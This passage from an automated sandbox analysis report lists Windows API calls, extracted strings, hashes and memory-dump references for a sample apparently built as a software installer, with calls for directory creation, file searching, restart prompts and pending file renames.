                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                            • String ID: $Need to restart Windows? %s
                                                                                            • API String ID: 1160245247-4200181552
                                                                                            • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                            • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                            • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                            • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                            • String ID: Creating directory: %s
                                                                                            • API String ID: 2451617938-483064649
                                                                                            • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                            • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                            • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                            • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                            • API String ID: 2508298434-591603554
                                                                                            • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                            • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                            • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                            • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                            • RegisterClassA.USER32(?), ref: 004164CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                            • String ID: @
                                                                                            • API String ID: 3749476976-2766056989
                                                                                            • Opcode ID: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                                            • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                            • Opcode Fuzzy Hash: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                                            • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                            APIs
                                                                                            • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                            • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                            • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: D41500D41520D41540
                                                                                            • String ID: %E
                                                                                            • API String ID: 2153611984-175436132
                                                                                            • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                            • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                            • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                            • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0044B401
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectReleaseSelect
                                                                                            • String ID: %H
                                                                                            • API String ID: 1831053106-1959103961
                                                                                            • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                            • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                            • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                            • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                            • String ID: %H
                                                                                            • API String ID: 65125430-1959103961
                                                                                            • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                            • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                            • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                            • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                            APIs
                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 395431579-1506664499
                                                                                            • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                            • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                            Strings
                                                                                            • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                            • PendingFileRenameOperations, xrefs: 00455A40
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                            • API String ID: 47109696-2115312317
                                                                                            • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                            • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                            • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                            • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                            • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                            • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                            • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                            APIs
                                                                                            • GetMenu.USER32(00000000), ref: 00421361
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu
                                                                                            • String ID:
                                                                                            • API String ID: 3711407533-0
                                                                                            • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                            • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 601730667-0
                                                                                            • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                            • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042311E
                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceEnumFontsRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2698912916-0
                                                                                            • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                            • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                            Strings
                                                                                            • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                            • NumRecs range exceeded, xrefs: 0045C396
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlush
                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                            • API String ID: 3593489403-659731555
                                                                                            • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                            • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                            APIs
                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                              • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                              • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                              • Part of subcall function 004063C4: 6F551CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                              • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                              • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                              • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                              • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                              • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
